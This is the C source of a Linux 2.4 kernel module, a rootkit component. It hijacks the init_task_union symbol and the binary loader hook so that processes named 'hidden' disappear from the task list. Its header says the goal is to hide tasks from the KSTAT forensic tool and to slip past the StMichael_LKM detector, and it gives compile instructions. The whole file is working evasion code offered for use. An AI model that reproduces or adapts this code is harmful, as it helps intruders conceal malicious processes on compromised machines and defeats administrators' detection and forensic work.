/* 2002-07-31#04:19
 *
 * HIJACKING KERNEL SYMBOLS AND FUNCTIONS USED TO LOAD BINARY FORMATS
 * ------------------------------------------------------------------
 *
 * With this module you can hide tasks to KSTAT, tool used to find
 * attakers in your system by a direct analysis of the kernel throught
 * /dev/kmem. (http://www.s0ftpj.org ..)
 * StMichael_LKM 0.10 (default installation) won't detect it!
 *
 *
 * working code for 2.4.x linux kernels.
 * compile: cc -c -I/usr/src/linux/include -O2 -Wall -o khideee.o khideee.c
 * (will hide all tasks with ->comm == "hidden")
 *
 * Dallachiesa Michele aka xenion
 * mail: xenionacidlife.com
 * home: http://www.acidlife.com/mayhem/tba/
 */

#define HIDDEN_COMM "hidden"

#define MODULE
#define __KERNEL__

#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/malloc.h>

struct task_struct *my_init_task;
void my_tasklist_init();
void my_tasklist_update();
void my_tasklist_hide();
void my_tasklist_free();

struct module_symbol *get_symbol_addr(const char *);
struct module_symbol *s_init_task_union;

int (*o_load_binary) (struct linux_binprm *,
                                  struct pt_regs * regs);

int n_load_binary(struct linux_binprm *bprm,
                              struct pt_regs *regs);

int
init_module(void)
{

    s_init_task_union = get_symbol_addr("init_task_union");

    my_tasklist_init();
    my_tasklist_update();

    s_init_task_union->value = (unsigned long) my_init_task;

    o_load_binary = init_task.next_task->binfmt->load_binary;
    init_task.next_task->binfmt->load_binary = n_load_binary;

    return 0;
}

void
cleanup_module(void)
{
    s_init_task_union->value = (unsigned long) &init_task;
    my_tasklist_free();
    init_task.next_task->binfmt->load_binary = o_load_binary;
}

int
n_load_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
    char *p,
                   *P;

    my_tasklist_update();
    my_tasklist_hide();

    for (p = P = bprm->filename; *p != '\0'; p++)
        if (*p == '/')
            P = p + 1;

    strncpy(my_init_task->prev_task->comm, P,
            sizeof my_init_task->prev_task->comm);
    my_init_task->prev_task->comm[15] = '\0';

    return o_load_binary(bprm, regs);
}

struct module_symbol *
get_symbol_addr(const char *name)
{
    struct module *mod;
    struct module_symbol *s;
    int i,
                    found;

    for (mod = THIS_MODULE; mod->next != NULL; mod = mod->next);

    for (found = 0, s = mod->syms, i = 0; i < mod->nsyms; ++i, ++s)
        if (strstr(s->name, name) != NULL) {
            ++found;
            break;
        }

    if (!found)
        return NULL;

    return s;
}

void
my_tasklist_init()
{
    my_init_task =
        (struct task_struct *) kmalloc(sizeof(struct task_struct),
                                       GFP_KERNEL);
    if (!my_init_task)
        return;

    memcpy(my_init_task, &init_task, sizeof(struct task_struct));

    my_init_task->next_task = my_init_task;
    my_init_task->prev_task = my_init_task;
}

void
my_tasklist_update()
{
    struct task_struct *p,
                   *P,
                   *tmp;

    if (!my_init_task)
        return;

    P = my_init_task;
    p = &init_task;

    if (my_init_task != my_init_task->next_task) { // not the first

        while (P->next_task != my_init_task &&
               p->next_task != &init_task &&
               p->next_task->pid == P->next_task->pid) {
            p = p->next_task;
            P = P->next_task;
        }

        while (my_init_task->prev_task != P) {
            tmp = my_init_task->prev_task;
            my_init_task->prev_task = my_init_task->prev_task->prev_task;
            kfree(tmp);
        }

    }

    for (p = p->next_task, tmp = P; p != &init_task; p = p->next_task) {
        P = (struct task_struct *) kmalloc(sizeof(struct task_struct),
                                           GFP_KERNEL);
        if (!P)
            return;
        memcpy(P, p, sizeof(struct task_struct));
        P->next_task = my_init_task;
        P->prev_task = tmp;
        tmp->next_task = P;
        tmp = P;
    }

    my_init_task->prev_task = P;
}

void
my_tasklist_free()
{
    struct task_struct *p;

    p = my_init_task;

    while (p->next_task != my_init_task) {
        p = p->next_task;
        kfree(p->prev_task);
    }

    kfree(p);
}

void
my_tasklist_hide()
{
    struct task_struct *p,
                   *tmp;

    for (p = my_init_task; (p = p->next_task) != my_init_task;)
        if (strcmp(p->comm, HIDDEN_COMM) == 0) {
            p->prev_task->next_task = p->next_task;
            p->next_task->prev_task = p->prev_task;
            tmp = p;
            p = p->prev_task;
            kfree(tmp);
        }
}

/*
 * EOF
 */

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